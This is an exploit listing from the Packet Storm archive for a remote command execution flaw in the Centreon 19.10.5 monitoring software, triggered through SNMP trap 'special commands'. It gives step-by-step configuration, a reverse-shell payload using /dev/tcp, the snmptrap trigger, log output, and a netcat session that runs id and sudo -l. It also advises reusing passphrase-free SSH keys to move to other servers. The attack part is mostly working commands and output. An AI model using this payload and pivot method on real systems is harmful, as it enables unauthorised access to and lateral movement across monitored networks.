exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Centreon 19.10.5 Remote Command Execution

Centreon 19.10.5 Remote Command Execution
Posted Jan 29, 2020
Authored by Fabien Aunay, Omri Baso

Centreon version 19.10.5 suffers from a centreontrapd remote command execution vulnerability.

tags | exploit, remote
SHA-256 | 04324f51cee387f1f74eb254c7e283bedc63a9863560d41a110278c3b9393862

Centreon 19.10.5 Remote Command Execution

Change Mirror Download
# Exploit Title: Centreon 19.10.5 - 'centreontrapd' Remote Command Execution 
# Date: 2020-01-29
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -

###########################################################################################################
Centreon 19.10.5 Remote Command Execution centreontrapd

Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.

It is possible to get a reverse shell with a snmp trap and gain a pivot inside distributed architecture.


Steps:
Objective 1 : Create a SNMP trap or use linkDown OID with special command in action 3
Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
Objective 3 : Assign service trap relation
Objective 4 : Get centreon id reverse shell

###########################################################################################################

# Objective 1 : Create or use SNMP trap OID with special command in action 3
- Configuration > SNMP Traps

[+] Trap name * : linkDown
[+] OID * : .1.3.6.1.6.3.1.1.5.3
[+] Special Command : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121


# Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
- Configuration > Services > Services by host

[+] Description * : TRAP RCE
[+] Linked with Hosts * : YOUR-LINKED-HOST
[+] Check Command * : App-Monitoring-Centreon-Service-Dummy
[+] DUMMYSTATUS : 0
[+] DUMMYOUTPUT : 0
[+] Passive Checks Enabled : YES
[+] Is Volatile : YES
[+] Service Trap Relation : Generic - linkDown


# Objective 3 : Assign service trap relation
- Configuration > SNMP Traps
- linkDown
- Relations

[+] Linked services : YOUR-LINKED-HOST - SERVICE DESCRIPTION

reload Central
Reload snmp config


# Objective 4 : Get centreon id reverse shell and think lateral

[+] Send your trap
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2

TIP: centreontrapd logfile:
2020-01-29 02:52:33 - DEBUG - 340 - Reading trap. Current time: Wed Jan 29 02:52:33 2020
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (DISMAN-EVENT-MIB::sysUpTimeInstance). Will attempt to translate to a numerical OID
2020-01-29 02:52:33 - DEBUG - 340 - Translated to .1.3.6.1.2.1.1.3.0
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (SNMPv2-MIB::snmpTrapOID.0). Will attempt to translate to a numerical OID
...
2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service 'TRAP RCE' for host 'supervision_IT'.
...
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
..


NOTE: Read the doc !!!
https://documentation-fr.centreon.com/docs/centreon/fr/latest/administration_guide/poller/ssh_key.html?highlight=keygen

The centreon id user shares configurations and instructions with satellite collectors trough SSH.
No passphrase used.
This allows you to move around the infrastructure after your RCE.


POC:

snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2

nc -lvnp 12345
Ncat: Version 7.50
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:38470.
id
uid=997(centreon) gid=994(centreon) groups=994(centreon),48(apache),990(centreon-engine),992(centreon-broker)
sudo -l
Matching Defaults entries for centreon on centreonlab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty

User centreon may run the following commands on centreonlab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close